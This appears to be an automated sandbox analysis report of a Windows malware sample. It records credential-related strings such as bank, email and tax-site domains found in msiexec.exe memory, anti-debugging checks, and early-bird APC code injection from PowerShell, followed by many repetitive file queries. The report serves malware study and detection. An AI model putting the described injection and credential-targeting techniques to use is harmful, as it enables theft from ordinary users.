Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	API call chain: ExitProcess graph end node			graph_0-2805
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	API call chain: ExitProcess graph end node			graph_0-2984

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_000BD044 LdrInitializeThunk,LdrInitializeThunk,

5_2_000BD044

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3C20000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
